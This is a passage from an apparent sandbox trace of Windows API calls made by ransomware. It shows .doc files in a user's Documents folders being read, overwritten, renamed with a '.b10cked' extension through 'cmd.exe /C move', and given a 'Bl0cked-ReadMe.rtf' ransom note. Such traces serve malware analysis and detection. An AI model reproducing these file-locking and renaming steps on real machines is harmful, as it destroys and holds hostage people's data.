lpDistanceToMoveHigh=0x12ec78*=0) returned 0x28d3 [0137.369] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x28d0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x28d0, lpOverlapped=0x0) returned 1 [0137.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WnPdVDXwSUv.doc", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WnPdVDXwSUv.doc", cchWideChar=15, lpMultiByteStr=0x131324c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WnPdVDXwSUv.doc", lpUsedDefaultChar=0x0) returned 15 [0137.374] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x51a3 [0137.375] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.375] CloseHandle (hObject=0x114) returned 1 [0137.375] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\WnPdVDXwSUv.doc", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC") returned 0x3f [0137.376] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0137.377] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd40, dwThreadId=0xd30)) returned 1 [0137.383] CloseHandle (hObject=0x110) returned 1 [0137.383] CloseHandle (hObject=0x114) returned 1 [0137.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0137.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0137.384] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount2=88) returned 3 [0137.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", 
cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0137.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.384] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.384] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.384] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.384] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.384] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0137.385] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.385] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.385] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 
lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xd3c, dwThreadId=0x5e0)) returned 1 [0137.386] CloseHandle (hObject=0x110) returned 1 [0137.386] CloseHandle (hObject=0x114) returned 1 [0137.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf")) returned 0x20 [0137.386] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.387] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.387] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.387] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.387] ReleaseMutex (hMutex=0xf8) returned 1 [0137.387] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.387] ReleaseMutex (hMutex=0xf8) returned 1 [0137.387] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.387] ReleaseMutex (hMutex=0xf8) returned 1 [0137.387] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.387] ReleaseMutex (hMutex=0xf8) returned 1 [0137.387] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bdjo8cwgfh9q_unjppu-.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.387] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19417666518) returned 1 [0137.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6777 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x628f [0137.389] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.390] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x6777 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.390] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x6777 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.391] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x33ba, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x33ba, lpOverlapped=0x0) returned 1 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.391] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x33ba, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x33ba, lpOverlapped=0x0) returned 1 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13242, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x33bd [0137.391] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x33ba, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x33ba, lpOverlapped=0x0) returned 1 [0137.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=-13242, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x33bd [0137.391] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x33ba, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x33ba, lpOverlapped=0x0) returned 1 [0137.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bDJO8cWgfh9q_unjpPU-.doc", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0137.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bDJO8cWgfh9q_unjpPU-.doc", cchWideChar=24, lpMultiByteStr=0x132f63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bDJO8cWgfh9q_unjpPU-.doc", lpUsedDefaultChar=0x0) returned 24 [0137.397] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x6777 [0137.397] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.397] CloseHandle (hObject=0x114) returned 1 [0137.398] 
GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC") returned 0x34 [0137.398] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0137.459] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd84, dwThreadId=0xd80)) returned 1 [0137.467] CloseHandle (hObject=0x110) returned 1 [0137.467] CloseHandle (hObject=0x114) returned 1 [0137.467] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.467] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: 
lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0137.467] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount2=72) returned 3 [0137.467] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.467] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.467] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.467] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.467] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.467] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.467] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0137.467] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.467] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.467] CreateProcessW (in: lpApplicationName=0x0, 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type 